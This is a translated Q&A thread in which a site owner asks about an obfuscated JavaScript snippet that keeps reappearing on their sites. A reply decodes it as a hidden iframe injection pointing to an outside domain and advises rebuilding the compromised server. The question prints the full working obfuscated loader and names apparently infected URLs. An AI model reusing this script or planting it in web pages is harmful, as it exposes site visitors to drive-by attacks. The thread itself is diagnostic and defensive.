Javascript“病毒”

我的所有网站上都有一些JS“病毒”的问题.它们位于不同的主机上,其中一些主机出现在此代码中.

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377,i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e,i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32阻止该网站,因为他认为有病毒.从源中删除代码没有帮助,因为它再次出现.它不能是XSS的结果,因为它甚至出现在静态网站上.

我试图对我的系统进行全面扫描,但没有用.所有网站上唯一的东西就是谷歌分析,我认为这不会导致这种情况.

编辑:您可以在http://www.postuj.cz/test/http://flavicius.php5.cz/看到它.

解决方法

They’re on different hostings,and on some one of them appears this code.

每个主机上的代码是否相同?您能举例说明其中一个受影响的域名,以便我们可以检查代码是否存在于服务器端而不仅仅是您的计算机上(这通常不太可能).

您发布的代码肯定非常可疑.解码后,它会将一个iframe写入http:// ecom.rarebreedfootwear.com/? (它尝试向网址添加缓存生成随机数,但由于拼写错误而失败).

在这个地址上没有任何明显的漏洞 – 也许最终的目标漏洞尚未到位,或者它只是稍后的真实攻击的测试运行,但是在您的网站上出现了意外的JavaScript,它解码自身并添加一个iframe是一个巨大的红旗.通常这意味着您的服务器已被盗用,需要使用新密码从头开始重新安装.

ETA:

you can see it for example at hxxp://flavicius.PHP5.cz/

谢谢.我删除评论以隐藏工作URL,因为它确实被感染了.无论是在应用程序级别还是Apache本身都不清楚,但每个页面底部都有可疑脚本.

因此,至少应用程序和可以想象的服务器已被泄露,应该脱机进行清理,重新安装和诊断:您需要了解攻击者是如何进入的,这样才不会再发生.作为第一个猜测,请检查您是否拥有最新版本的wordpress,因为它过去曾遭遇过许多安全漏洞.

相关文章

前言 做过web项目开发的人对layer弹层组件肯定不陌生,作为l...
前言 前端表单校验是过滤无效数据、假数据、有毒数据的第一步...
前言 图片上传是web项目常见的需求,我基于之前的博客的代码...
前言 导出Excel文件这个功能,通常都是在后端实现返回前端一...
前言 众所周知,js是单线程的,从上往下,从左往右依次执行,...
前言 项目开发中,我们可能会碰到这样的需求:select标签,禁...